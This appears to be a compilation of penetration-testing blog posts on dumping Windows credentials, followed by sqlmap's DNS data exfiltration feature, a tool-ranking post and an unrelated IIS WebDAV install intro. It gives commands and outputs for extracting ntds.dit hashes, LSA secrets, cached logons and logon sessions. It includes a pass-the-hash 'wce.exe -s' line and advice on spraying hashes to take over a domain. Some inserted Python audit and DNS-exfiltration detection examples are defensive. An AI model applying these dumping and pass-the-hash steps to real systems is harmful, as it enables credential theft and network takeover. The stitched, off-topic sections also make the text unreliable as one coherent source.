Like standalone machines, you can use the in-memory technique too to dump the domain users’ hashes. The tools are the same and work equally. Just be cautious when injecting into the LSASS process of a domain controller: in the worst case scenario, you will have to reboot an infrastructure-critical server.
I have added these tools and improved the spread-sheet.
Updates on January 4, 2012
During December 2011, Csaba Barta has dug some more into NTDS.dit structure and as a result he has developed a new framework called NTDSXtract to extract information from database tables extracted with libesedb from ntds.dit file: both tools now support 64-bit derived database files too.

Download and install the latest release of libesedb.

Extract the database tables from ntds.dit:

$ esedbexport -l /tmp/esedbexport.log -t /tmp/ntds.dit <ntds.dit file>
esedbexport 20111210

Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag2) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.

$ ls -1 /tmp/ntds.dit.export/
datatable.3
hiddentable.4
link_table.5
[…]

Use NTDSXtract to parse the datatable and extract users’ information, including password hashes and history:

~/NTDSXtract 1.0$ python dsusers.py /tmp/ntds.dit.export/datatable.3 /tmp/ntds.dit.export/link_table.5 --passwordhashes <SYSTEM file> --passwordhistory <SYSTEM file> --certificates --supplcreds <SYSTEM file> --membership > /tmp/ntds.dit.output

Use this small script that I have put together to process the output of NTDSXtract’s dsusers.py into a “pwdump-alike” penetration tester’s friendly format:

$ python ntdstopwdump.py /tmp/ntds.dit.output
Administrator:500:NO PASSWORD*********************:09b1708f0ea4832b6d87b0ce07d7764b:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::

Part 3: Password storage and tracing

Password history
In the previous two posts of this series, I discussed how to dump Windows local users’ password hashes (SAM) and Windows domain users’ password hashes from domain controllers (ntds.dit).
When the password policy setting is configured to enforce password history, Windows stores a certain number of used passwords before an old password can be reused. The following screenshot shows you where this policy can be set.

Local Security Policy (secpol.msc) / Account Policies / Password Policy / Enforce password history

By default on workstations, this value is set to 0 and on domain controllers it is set to 24. This means that when dumping domain users’ hashes from active directory’s ntds.dit file, there are high chances to dump also the password history allowing you, during the password cracking phase, to recognise patterns used by the target users.
Despite not being current password hashes, pattern identification can lead to further attacks. For instance, ease of guessing passwords used against standalone services at later stages of your post-exploitation. Therefore, never underestimate the added value provided by dumping and cracking the password history.
Many of the tools introduced so far can dump the password history: Cain & Abel and PWDumpX, among others. pwhist from Toolcrypt is also a valid option.
LSA secrets
LSA secrets is an area in the registry where Windows stores important information. This includes:

  • Account passwords for services that are set to run by operating system users as opposed to Local System, Network Service and Local Service.
  • Password used to logon to Windows if auto-logon is enabled or, generally, the password of the user logged to the console (DefaultPassword entry).

LSA secrets are stored in registry hive HKEY_LOCAL_MACHINE\Security\Policy\Secrets. Each secret has its own key. The parent key, HKEY_LOCAL_MACHINE\Security\Policy, contains the data necessary for accessing and decoding the secrets.
Dump LSA secrets
As per SAM hashes, the LSA secrets can be accessed by DLL injection into the lsass.exe process or from the registry files.
If you are Administrator and the target system is used in production, I recommend that you choose the safe path and copy the registry files SYSTEM and SECURITY off the system: you can use the legacy registry hive copy (reg.exe/regedit.exe) or the volume shadow copies technique illustrated in the first post. Cain & Abel can extract LSA secrets from these files.
Alternatively, there are numerous tools that can be used to dump LSA secrets by injecting into lsass.exe process: gsecdump has proved to be the most reliable for LSA secrets, working across all Windows versions and architectures. On 32-bit architecture, the original lsadump2 has proved to be good too. Despite my expectations, the two NirSoft tools (LSASecretsDump and LSASecretsView) have failed to dump services’ account passwords, regardless of the architecture.
Regardless of the technique used, the passwords extracted are UTF-16 encoded. This means that they are in clear-text as opposed to SAM hashes. You can read a detailed description of the LSA secrets format here by Brendan Dolan-Gavitt.
The following screen-shot shows the output of gsecdump on a Windows Server 2003 machine running IBM DB2 and PostgreSQL. Both database management systems run as Windows local users:

Output of gsecdump.exe -l to dump LSA secrets

Threats posed by LSA secrets

Now, imagine that you have compromised a server part of a Windows domain, you have got a shell as Local System. If you want to extend your control over the network perimeter, one of the viable ways is to verify if any service runs as real operating system users and, if so, extract their clear-text password from LSA secrets.
You can run services.msc from Start / Run and sort the entries by Log On As column to check this quickly. The following screen-shot demonstrates this:

Services running as local users on Windows

Obviously, the built-in sc.exe command can do the same as well as other less known tools.
It is common to identify enterprise software like Veritas Netbackup, Microsoft SQL Server, Microsoft Exchange and others running as real users. More dangerously, sometimes system administrators opt to run services as domain users, if not domain administrators.
This is clearly wrong and poses a high threat to overall security of the target Windows domain because, as an attacker, you can dump the LSA secrets and use the clear-text domain administrator password to login to the root domain controller and takeover the Windows network.
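Seen from the administrator's side, the same check becomes an audit: the Python below (an added example, not part of the original post) parses sc.exe qc output and lists the services whose SERVICE_START_NAME is a real local or domain account, i.e. the ones whose passwords end up in LSA secrets. The sample output, the BackupAgent service and the LAB\svc_backup account are constructed for illustration.

```python
import re

# Constructed sample: concatenated `sc.exe qc <service>` output from a host
# named W2K3R2. BackupAgent, LAB\svc_backup and the paths are made-up values.
SAMPLE_SC_OUTPUT = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: DB2
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\IBM\SQLLIB\BIN\db2syscs.exe
        DISPLAY_NAME       : DB2 - DB2COPY1 - DB2
        SERVICE_START_NAME : .\db2admin

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: BackupAgent
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : "C:\Program Files\Backup\agent.exe"
        DISPLAY_NAME       : Backup Agent
        SERVICE_START_NAME : LAB\svc_backup

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Spooler
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\WINDOWS\system32\spoolsv.exe
        DISPLAY_NAME       : Print Spooler
        SERVICE_START_NAME : LocalSystem

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Dnscache
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\WINDOWS\system32\svchost.exe -k NetworkService
        DISPLAY_NAME       : DNS Client
        SERVICE_START_NAME : NT AUTHORITY\NetworkService
"""

KEY_VALUE = re.compile(r"^\s*([A-Z_]+)\s*:\s?(.*)$")

# Built-in identities (lower-cased, spaces removed). Services running as these
# have no user password stored for them in LSA secrets.
BUILTIN = {
    "localsystem",
    "ntauthority\\system",
    "ntauthority\\localservice",
    "ntauthority\\networkservice",
}


def parse_sc_qc(text):
    """Split concatenated `sc qc` output into one dict per service."""
    services, current = [], None
    for line in text.splitlines():
        match = KEY_VALUE.match(line)
        if not match:
            continue  # banner lines such as "[SC] QueryServiceConfig SUCCESS"
        key, value = match.group(1), match.group(2).strip()
        if key == "SERVICE_NAME":
            current = {"SERVICE_NAME": value}
            services.append(current)
        elif current is not None:
            current[key] = value
    return services


def classify_account(start_name, hostname):
    """Return 'builtin', 'local' or 'domain' for a SERVICE_START_NAME value."""
    name = start_name.strip()
    folded = name.lower().replace(" ", "")
    # Empty start names (drivers) and NT SERVICE\ virtual accounts are not users.
    if not folded or folded in BUILTIN or folded.startswith("ntservice\\"):
        return "builtin"
    if "@" in name:  # UPN form, user@domain
        return "domain"
    realm, sep, _user = name.rpartition("\\")
    if not sep or realm == "." or realm.lower() == hostname.lower():
        return "local"
    return "domain"


def audit(text, hostname):
    """List (service, account, kind) for every service run as a real user."""
    findings = []
    for svc in parse_sc_qc(text):
        account = svc.get("SERVICE_START_NAME", "")
        kind = classify_account(account, hostname)
        if kind != "builtin":
            findings.append((svc["SERVICE_NAME"], account, kind))
    # Domain accounts first: their exposure reaches beyond this one host.
    return sorted(findings, key=lambda f: (f[2] != "domain", f[0].lower()))


if __name__ == "__main__":
    for service, account, kind in audit(SAMPLE_SC_OUTPUT, "W2K3R2"):
        print(f"{kind:6} {account:20} {service}")
```

Every entry the audit returns is a candidate for a lower-privileged, single-purpose account; a domain administrator in that list is the case the paragraph above warns about.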

Cached domain logon information
Windows machines can be standalone workstations or part of a Windows domain in the role server or workstation.
When a user logs onto a workstation part of a domain, technically he can either log as a local user or a domain user given that he has the credentials.
When logging as a domain user, three pieces of information are required: username, password and domain name. The latter is usually provided as a drop-down menu listing all domains that the system is part of.
Given this information, when the domain user logs onto the system, the provided password is hashed and checked over the network against the domain controller’s valid password hash (physically stored within ntds.dit file). This process is handled once again by the lsass.exe process.
LSASS first checks if the domain controller is available. If so, it proceeds with the password hash matching step and, depending on the result, it allows or denies access to the system to the authenticating domain user.
In the event that none of the domain controllers are available, the legitimate domain user would not be able to log in to the system. To prevent this from happening, Microsoft long ago introduced the cached domain logon information mechanism in Windows.
Definition from Microsoft:

All previous users’ logon information is cached locally so that, in the event that a domain controller is unavailable during subsequent logon attempts, they are able to log on […]

Therefore, when the domain controllers are not available, the domain user can still log onto the domain machine. The only caveats being that he has previously successfully logged and that the system is configured to cache the domain logon information. The following screenshot shows you where this policy is set.

Local Security Policy (secpol.msc) / Local Policies / Security Options / Interactive logon: Number of previous logons to cache (in case domain controller is not available)

You can also read the value of this policy in registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\CachedLogonsCount.
By default, Windows XP and above are configured to cache 10 or more domain logon entries.
Cached domain logon information is stored in registry hives HKEY_LOCAL_MACHINE\Security\CACHE\NL$X with X being a number. These registry hives are accessible by Local System and tools exist to dump them.
Dump cached domain logon information
Like other hashes, these hashes can be accessed by DLL injection into the lsass.exe process or from the registry files.
For an offline dump, copy the registry files SYSTEM and SECURITY off the system: you can use the legacy registry hive copy (reg.exe/regedit.exe) or the volume shadow copies technique illustrated in the first post. Cain & Abel, creddump by Brendan Dolan-Gavitt and Windows Password Recovery by passcape can extract cached domain logon information from these files.
Alternatively, there are numerous tools that can dump this by DLL injection into lsass.exe process. On 32-bit architecture you can use the original cachedump by Arnaud Pilon which proved to be reliable also on recent Windows versions, fgdump or PWDumpX.
Unfortunately though, none of the standalone free tools work on 64-bit architecture. In this case, you can rely on Metasploit Framework’s own post-exploitation module if you have got a Meterpreter shell onto the target system.
The output of cachedump on a Windows system part of a domain follows:

C:\>cachedump.exe -v
Service not found. Installing CacheDump Service (C:\cachedump.exe -s)
CacheDump service successfully installed.
Service started.
user:2d9f0b052932ad18b87f315641921cda:lab:lab.internal
Service currently active. Stopping service…
Service successfully removed.

Threats posed by cached domain logon information
Similar scenario to LSA secrets dump: you have compromised a machine part of a Windows domain and have got a shell as Local System. There are no traces of domain users’ credentials from LSA secrets. Another step to extend your control over the domain? Check if the machine is configured to cache domain logon information as explained above. If so, dump them.
Cached domain logon information cannot be directly used to authenticate to other systems as opposed to NT and LM password hashes. Nevertheless, you can crack them and use the clear-text password to authenticate to machines part of the relevant domain. I will cover password hashes cracking in depth in another blog post.
Conceptually, caching domain logon information is effective and solves network administrators’ headaches to deal with domain users logons when the domain controllers are under maintenance or unavailable for whatever reason. Although, looking at it with the security lens, it clearly poses a security threat.

 

Part 5: Logon sessions

Logon sessions
Windows stores in memory information about every current and past successful logon. These are called logon sessions. This information includes the username, the domain or workgroup name and both the LM and NT password hashes.
Every time a legitimate user logs onto a Windows system, the Local Security Authority (LSA) stores in memory this information. This happens regardless of the logon type: interactive logon to the console or remote logon via Remote Desktop Protocol (RDP).
The image below from Hernan Ochoa illustrates this concept:

Windows NT logon and authentication model

The same information is stored for RunAs processes and services running as specific users. In the latter case, the clear-text password is stored in memory and can be retrieved in LSA secrets anyway.
Exception being network logons, for instance over SMB or HTTP; these do not get stored because the NT/LM hashes never actually reach the server. A challenge-response mechanism is used for authentication.
This sensitive information is kept in memory because it is used for Single Sign-On (SSO) purposes.
SSO technology is extensively used in Windows network, particularly within domains. This allows, for instance, a user logged into a certain system of the domain to access remote shares, shared resources like printers and HTTP proxy protected by NTLM authentication without the need to type in his clear-text credentials each time: Windows deals with the authentication for him transparently over the network by providing exactly what is stored in memory: username, domain/workgroup and password hashes.
This authentication mechanism works because nowadays nearly all Windows services accept authentication with NT/LM hashes as an alternative to clear-text password. Exception being Remote Desktop Protocol.
Dump logon sessions
Logon sessions can be dumped given you have an administrative shell onto the target. There exist two techniques to dump logon sessions: code injection into lsass.exe process and reading of LSASS memory.
There are several tools that can dump logon sessions: msvctl from TrueSec is a safe choice for Windows XP/2003 and is limited to 32-bit architecture. The updated version of gsecdump can dump logon sessions regardless of Windows version and architecture too. More recent tools include another nice piece of code from TrueSec, lslsass: this tool has been designed specifically for Windows Vista onwards and delivers reliable results regardless of the architecture.
The most well known tools to manipulate Windows logon sessions are Windows Credentials Editor (WCE) and its predecessor, Pass-The-Hash Toolkit (PTK). Both are the result of thriving research by Hernan Ochoa, currently the founder of Amplia Security. His presentations include:

  • Pass-The-Hash Toolkit for Windows: Implementation & use presented at Hack In The Box Security Conference in Malaysia on late 2008. Despite being a dated presentation, it offers insight on the history and techniques used in post-exploitation scenarios, specifically focusing on the more generic Pass-the-Hash technique and its implementation in the Pass-The-Hash Toolkit.
  • WCE Internals presented at RootedCon in Madrid on early 2011. This presentation explains the inner workings of WCE including how Windows store credentials in memory pre and post Windows Vista.
  • Post-Exploitation with WCE presented on July 2011. Simple and effective high-level presentation with test cases. I recommend you reading this presentation before anything else if you are totally unfamiliar with logon sessions and pass-the-hash technique. Another good read is the tool’s FAQ page.

Between these two tools, I prefer WCE for a number of reasons: it is one single executable, it is safer than all the other tools as it is the only one to implement the reading of LSASS memory technique as an alternative to performing code injection and it works across all Windows versions and on both architectures.

For the purpose of this post, I have set a Windows Server 2003 R2 Service Pack 2 fully patched machine (NetBIOS name: w2k3r2) in the following state:

  • Local Administrator with a 15-characters long password logged interactively to the console.
  • Two local users, inquis and foobar, both connected over RDP, respectively using mstsc, the default RDP client on Windows, and rdesktop, a RDP client for Unix/Linux.
  • A few services, all related to IBM DB2 database management system, running as local administrator, db2admin.

lslsass was deliberately excluded from my tests as it only works on Windows Vista onwards.

All the tested tools were able to dump the logon sessions successfully. The output of Windows Credentials Editor follows:

C:\>wce.exe -l

WCE v1.2 (Windows Credentials Editor) – (c) 2010,2011 Amplia Security – by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Administrator:W2K3R2:00000000000000000000000000000000:237599E85CF684A6785A12ACD2E24E5C
inquis:W2K3R2:0AC9A586623764E16591BB5472A3AD4A:89F411F435A93044E2E8AA4CEDFE0FBA
foobar:W2K3R2:87DCEB9223BE0E08FD8E74C8CEB3053A:33D807D89B36ACDF2FAB42A361DE0B91
db2admin:W2K3R2:3AE6CCCE2A2A253F93E28745B8BF4BA6:35CCBA9168B1D5CA6093B4B7D56C619B

W2K3R2$:WORKGROUP:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0

As you can see, these tools dump logon sessions and display the username, domain/workgroup name and LM/NT hashes very similarly to SAM hashes dump tools output. The main difference is that these tools display the domain/workgroup name as domain users can be logged onto the system too as opposed to the user ID field shown by pwdump-alike tools.
The following screen-shot demonstrates the successful dump too:

Dump of logon sessions with Windows Credentials Editor (WCE) on a Windows Server 2003 R2 machine where the Administrator is logged to the console, two users are logged remotely via RDP and one service is running as local user
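The two line formats compared above can also be read as an audit of how credentials are stored. The Python below is an added example, not part of the original post or of any tool it mentions: it parses both the WCE-style (user:domain:LM:NT) and the pwdump-style (user:RID:LM:NT:::) lines shown in this post and flags accounts that still have an LM hash stored or that have an empty password. The finding names are hypothetical labels chosen for this example.

```python
import re
from collections import namedtuple

# Well-known constants: the LM and NT hashes of the empty string.
EMPTY_LM = "AAD3B435B51404EEAAD3B435B51404EE"
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"

HEX32 = re.compile(r"^[0-9A-Fa-f]{32}$")
Entry = namedtuple("Entry", "user realm lm nt fmt")

# Sample lines copied from the outputs shown in this post, plus one banner
# line and the cachedump line, which are not LM/NT pairs and must be skipped.
SAMPLE_LINES = [
    "Use -h for help.",
    "Administrator:W2K3R2:00000000000000000000000000000000:237599E85CF684A6785A12ACD2E24E5C",
    "inquis:W2K3R2:0AC9A586623764E16591BB5472A3AD4A:89F411F435A93044E2E8AA4CEDFE0FBA",
    "foobar:W2K3R2:87DCEB9223BE0E08FD8E74C8CEB3053A:33D807D89B36ACDF2FAB42A361DE0B91",
    "db2admin:W2K3R2:3AE6CCCE2A2A253F93E28745B8BF4BA6:35CCBA9168B1D5CA6093B4B7D56C619B",
    "W2K3R2$:WORKGROUP:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0",
    "user:2d9f0b052932ad18b87f315641921cda:lab:lab.internal",
    "Administrator:500:NO PASSWORD*********************:09b1708f0ea4832b6d87b0ce07d7764b:::",
    "Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::",
]


def _norm(field):
    """Upper-cased hash, or None for a placeholder (all zeros, 'NO PASSWORD')."""
    if HEX32.match(field) and set(field) != {"0"}:
        return field.upper()
    return None


def parse_line(line):
    """Return an Entry for a WCE-style or pwdump-style line, else None."""
    parts = line.strip().split(":")
    # pwdump-style: user:RID:LM:NT::: -> seven fields, numeric RID.
    if len(parts) == 7 and parts[1].isdigit():
        user, rid, lm, nt = parts[:4]
        return Entry(user, rid, _norm(lm), _norm(nt), "pwdump")
    # WCE-style: user:domain:LM:NT -> four fields, both hashes 32 hex digits.
    if len(parts) == 4 and HEX32.match(parts[2]) and HEX32.match(parts[3]):
        user, realm, lm, nt = parts
        return Entry(user, realm, _norm(lm), _norm(nt), "wce")
    return None


def audit(lines):
    """Return (user, finding) pairs for weakly stored credentials."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        # Windows only computes an LM hash for passwords of 14 characters or
        # fewer, so a real LM value also bounds the password length.
        if entry.lm and entry.lm != EMPTY_LM:
            findings.append((entry.user, "lm_hash_stored"))
        if entry.nt is None or entry.nt == EMPTY_NT:
            findings.append((entry.user, "empty_password"))
    return findings


if __name__ == "__main__":
    for user, finding in audit(SAMPLE_LINES):
        print(f"{finding:15} {user}")
```

The Administrator account with its 15-character password produces no finding in either format, while the three other local users are reported because their LM hashes are present.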

I realized during my tests that regardless of the method used to close a session, the logon sessions remain in memory. Take RDP connections, either if you disconnect (clicking on the top right X button of your RDP client) or log off from the Start menu, they remain in memory. I have seen this happening on Windows Server 2008 R2 Enterprise Service Pack 1 too. The main difference being that on Windows Vista onwards the logon sessions are erased from memory a few minutes after the user has logged off.

The following screen-shots demonstrate the described behaviour:

Dump of logon sessions following a disconnect via RDP of one user, foobar – his logon session remains in memory

Dump of logon sessions following a forced log off of user’s foobar RDP connection – his logon session remains in memory

The db2admin logon session also remains in memory even though the relevant services are stopped.

Threats posed by logon sessions

The scenario here is similar to LSA secrets dump and cached domain logon information: you are Local System on a machine part of one or more Windows domains and you want to takeover the domains. There are no traces of domain users’ credentials from LSA secrets and the machine does not cache domain logon information.

To extend your control over the domain you can dump the logon sessions. If there is a logon session of a domain administrator, it is game over: impersonate that logon session to spawn a command prompt. This technique is also known as pass-the-hash or logon session stealing.

The command line would look like:

C:\>wce.exe -s <user>:<domain>:<LM hash>:<NT hash> -c cmd.exe

In the new command prompt window, connect over SMB, for instance with Sysinternals’ PsExec, to the root domain controller to take over the Windows domain – Windows will use the impersonated NTLM credentials to authenticate against the domain controller and access will likely be granted as you are now, as a matter of fact, the domain administrator.

Alternatively, if there are no domain administrators’ logon sessions, you can still spray the dumped logon sessions’ hashes to other machines of the domain exactly the same way you do to verify password reuse across machines with the local users’ password hashes: in the event that you have dumped domain users’ logon sessions, chances are high that these users are allowed to log in to other systems of the network, therefore you have an easy way into these.

These systems might be vulnerable to other threats that allow you to take over the domain from there, so it is definitely worth a try.

 

Part 6: Authentication over the network layer:

Network services authentication credentials
Like LSA secrets, Windows stores passwords in a reversible format elsewhere.
When you login to a network resource like a network share, a proxy server behind NTLM authentication, a database management system, a mail server, etc, you can often instruct your client to save the password, typically by simply ticking the box “Remember my password”.
Behind the scenes, Windows stores this information in the Credential Manager – a single sign-on (SSO) solution that exists since Windows XP. These stored credentials are used to authenticate each time the corresponding network resource is accessed by the user without the need to retype the password.
These passwords are encrypted using the DPAPI subsystem and can be dumped in clear-text format.
You can also view, edit and add to this password storage. On Windows Vista onwards the Credential Manager is available under Control Panel\User Accounts and Family Safety\Credential Manager or from Control Panel\User Accounts and Family Safety\User Accounts\Manage your credentials.
Another storage used by Windows for a similar purpose is the Protected Storage. Applications like Internet Explorer and Outlook Express store the email account password in this storage, where they do not opt to store in the Credential Manager. The passwords stored in the Protected Storage are encrypted using the CryptoAPI functions and the key is derived from the user’s password therefore they can be dumped in clear-text format too.

Third-party software like Chrome, RealVNC Client, Thunderbird and others store passwords to websites in their own format. Some tools store them within the registry, some use the Windows API and store them in the Credential Manager or the Protected Storage and others in files. Regardless, all these credentials are stored in a reversible format, publicly documented or not, they can be dumped in clear-text like Credential Manager and Protected Storage passwords.

Dump Credential Manager
The methods to interact with the Credential Manager are documented by Microsoft and implemented in a number of tools able to dump these credentials.
NirSoft’s Network Password Recovery (netpass) is my first choice. It is one-executable only tool and reliable. Make sure you run the 64-bit version on 64-bit architecture.
Cain & Abel can also dump the Credential Manager efficiently, however it only works locally not remotely so you should better avoid it unless installing new software is permitted onto the target machine.
Passcape’s Network Password Recovery, not to be confused with the namesake tool from NirSoft, also works well, but the trial version only displays the first three characters of the dumped passwords.
Avoid Metasploit’s own post-exploitation module windows/gather/credentials/enum_cred_store – it has always crashed regardless of the target Windows version.
Dump Protected Storage
NirSoft’s Protected Storage PassView (pspv) is my first choice. It is one-executable only tool and reliable.
Another tool to consider is carrot, a bundle of other tools (primarily from NirSoft), good to dump Protected Storage credentials.
Avoid fgdump as it fails to dump the protected storage.

Dump third-party software stored credentials

NirSoft has a vast collection of tools to dump third-party software stored credentials. Many of these are bundled in one-executable only tool, carrot.

If you have got a Meterpreter shell onto the target system, Metasploit is handy to dump third-party software stored credentials as it has numerous post-exploitation modules for this purpose. Some are pretty much reliable, others are in beta and often crash.

Threats posed by network services authentication credentials
During an internal infrastructure assessment it is likely that you are able to own a workstation before a server.
When this occurs, collecting information about what is the role of the machine within the infrastructure is a crucial step to successfully compromise the overall network. In cases where the machine is an employee’s workstation used daily, chances are very high that he uses it to access his corporate email, internal web sites, corporate proxy and other services. If so, chances are even higher that the user has ticked the “Remember my password” entry, everywhere.
Having access, even as a low-privileged user, to these corporate systems “for free” is priceless and useful in your run to extend your control over the network and demonstrate to the customer how even the average and most insignificant workstation far from the DMZ need to be taken care of systematically.
Often corporate email credentials, network shares passwords and others are reused by users across different services if not the domain user account too so being able to dump the credentials in clear is high value during a penetration test.

 

Part 7: Retrieving data over DNS in SQL

We have recently implemented data retrieval over DNS in sqlmap. This data exfiltration technique adds up to the six existing techniques already implemented: boolean-based blind, time-based blind, full UNION, partial UNION, error-based and stacked (nested) queries. It is supported on Oracle (running either on UNIX/Linux or Windows) and Microsoft SQL Server/MySQL/PostgreSQL (running on Windows).
The technique can be tested for and used by providing sqlmap with the --dns-domain switch followed by a hostname that resolves over the Internet to the machine where you are running sqlmap from. You do not need to run your own name server daemon, so you can use a freely available DynDNS or similar solution: sqlmap starts a fake DNS server on 53/udp, so you need to run it with uid=0 privileges, and it automatically handles the DNS requests from the target DBMS (actually from the DMZ’s DNS server misconfigured to resolve Internet hostnames).
In cases where the target parameter is vulnerable and exploitable by either of the blind techniques or both of them, then sqlmap will test for DNS exfiltration too and prefer it over the blind techniques as it is much faster. Needless to say that both error-based and UNION based techniques are preferred if identified exploitable.
The paper and slide-deck presented recently at PHDays conference in Moscow, Russia are available on my fellow sqlmap developer’s Slideshare page:

I recommend you always run the latest development version of sqlmap from its Subversion repository:

$ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
$ cd sqlmap-dev
$ python sqlmap.py -h
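On the defending side, data retrieval over DNS as described above shows up in resolver logs as a burst of unique, encoded-looking names under a single domain, requested on behalf of a database server. The Python below is an added example, not sqlmap code: the log line format, the thresholds, the hex-label heuristic and the exfil.example domain are all assumptions made for illustration.

```python
import re
from collections import defaultdict

# Assumption: leaked data travels as hex-encoded DNS labels. A label is at
# most 63 characters long; 16 hex digits is the shortest run treated as data.
HEX_LABEL = re.compile(r"^[0-9a-f]{16,63}$")


def parent_domain(qname, depth=2):
    """Naive parent zone: the last `depth` labels (ignores multi-part TLDs)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-depth:])


def encoded_labels(qname, depth=2):
    """Hex-looking labels in front of the parent zone."""
    labels = qname.rstrip(".").lower().split(".")
    return [label for label in labels[:-depth] if HEX_LABEL.match(label)]


def detect_dns_exfil(log_lines, min_unique=5, min_encoded_ratio=0.8):
    """Flag parent zones that receive many unique names carrying hex labels.

    Each log line is expected as: <timestamp> <client-ip> <qname> <qtype>
    """
    names, clients = defaultdict(set), defaultdict(set)
    for line in log_lines:
        fields = line.split()
        if len(fields) != 4:
            continue  # not a query record in the assumed format
        _ts, client, qname, _qtype = fields
        qname = qname.rstrip(".").lower()
        parent = parent_domain(qname)
        names[parent].add(qname)
        clients[parent].add(client)

    alerts = []
    for parent in sorted(names):
        unique = names[parent]
        carrying = [name for name in unique if encoded_labels(name)]
        if len(unique) < min_unique:
            continue  # too few distinct names to look like a data channel
        if len(carrying) / len(unique) < min_encoded_ratio:
            continue  # mostly ordinary host names
        approx = sum(len(l) // 2 for name in carrying for l in encoded_labels(name))
        alerts.append({
            "domain": parent,
            "unique_names": len(unique),
            "clients": sorted(clients[parent]),
            "approx_bytes": approx,  # two hex digits per leaked byte
        })
    return alerts


def build_sample_log():
    """Constructed resolver log: a DB server leaking 48 bytes, plus noise."""
    secret = b"CONSTRUCTED-SAMPLE-SECRET-VALUE-0123456789-ABCDE"  # 48 bytes
    lines = []
    for i in range(0, len(secret), 8):
        chunk = secret[i:i + 8].hex()
        lines.append(f"2012-06-01T10:00:{i:02d} 10.0.0.20 q{i}.{chunk}.exfil.example A")
    for host in ("www", "mail", "intranet", "wiki", "proxy", "files"):
        lines.append(f"2012-06-01T10:01:00 10.0.0.31 {host}.example.com A")
    # A single hash-like CDN name must not raise an alert on its own.
    lines.append("2012-06-01T10:02:00 10.0.0.31 "
                 "d41d8cd98f00b204e9800998ecf8427e.cdn.example.org A")
    return lines


if __name__ == "__main__":
    for alert in detect_dns_exfil(build_sample_log()):
        print(alert)
```

Alerts are most meaningful when the client is a database or DMZ server, which normally has no reason to resolve arbitrary Internet hostnames.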

Part 8: 125 tools for protecting computer systems:

The top 125 computer security tools

The security community has spoken! About 3,000 people have rated the best and most widely used computer security tools. The Nmap project has collected the results of their survey in a relaunched version of their SecTools.org project: Top 125 Network Security Tools.

sqlmap has made it to place #30 overall: a great result considering that it is a two-developers only project driven by passion, developed in our own spare time and with a large community of supporters, testers and enthusiasts.

The previous SecTools.org survey was dated 2006, when the sqlmap project had just started and was unknown to most. In five years the tool has evolved from a few hundred lines of code to a massive Python tool, versatile and powerful. The security community has acknowledged this: it is the only tool in the list to combine SQL injection detection, data analysis and database takeover capabilities against numerous database management systems, although a lot of other similar tools have been developed throughout the years.

I found particularly interesting that many people highly rated web proxies in the web scanners category: 3 of the top 5 tools are web proxies. I read it as a positive sign: it means to me that manual testing is the preferred way by many to perform web application assessments as opposed to fully automated web scanners that, for the sake of clarity, can not cover business logic flaws by their design nature, hardly identify session management issues and struggle with multiple user levels’ access control list enforcement verification.

The #1 tool in the category is Burp Suite, a tool that I use on many web application and web service penetration testing engagements. A tool that eases and assists me in the process of carefully and manually assessing the security of web applications. Congratulations to Dafydd Stuttard for his great work!

sqlmap scored 6th place in this category, ahead of several commercial web scanners backed by big companies and developed by dozens of people. People could argue that this is because sqlmap is free so more people have access to it, fair point. I like to think that it scored high also because it addresses one single web application vulnerability type, the most critical, and does it damn well in the right hands. On top, we have added a lot of features, takeover functionalities, coverage for many database management systems and several optimizations.

Out of 11 tools in the sploits category, sqlmap was rated 4th: another great result in my opinion. Like Metasploit framework (#1 of the category) and w3af (#3 of the category), it is open source. It’s the only niche tool focusing on exploiting SQL injections, database design flaws and their mis-configurations against a variety of database software.

sqlmap would not be the great tool that it is today without its user base. I want to thank everyone who has contributed during the last five years with moral support, detailed feedback, overly appreciated patches, bug reports and acclaiming it publicly as a very handy and valuable tool.

Greetings also to the authors of renowned books for citing and reviewing sqlmap. These include the recently revamped The Web Application Hacker’s Handbook and SQL injection attacks and defense.

 

References:

http://mdsec.net/wahh/code2e.html

Video demo: http://mdsec.net/labs/demo.html

Installation steps: WebDAV for Windows Server 2008 R2


Introduction

Microsoft released a new WebDAV extension module that was completely rewritten for Internet Information Services (IIS) 7 on Windows Server® 2008. This new WebDAV extension module incorporated many new features that enable Web authors to publish content better than before, and offers Web administrators more security and configuration options. Microsoft has released an update to the WebDAV extension module for Windows Server® 2008 that provides shared and exclusive locks support to prevent lost updates due to overwrites.

This document walks you through adding WebDAV publishing to an existing Web site by using the new WebDAV user interface and by directly editing the IIS configuration files.

Note: This walkthrough contains a series of steps in which you log on to your Web site using the local loopback address and the local administrator account. When using an administrator account, these steps should only be followed on the server itself using the loopback address or over SSL from a remote server. If you prefer to use a separate user account instead of the administrator account, you must create the appropriate folders and set the correct permissions for that user account when necessary.

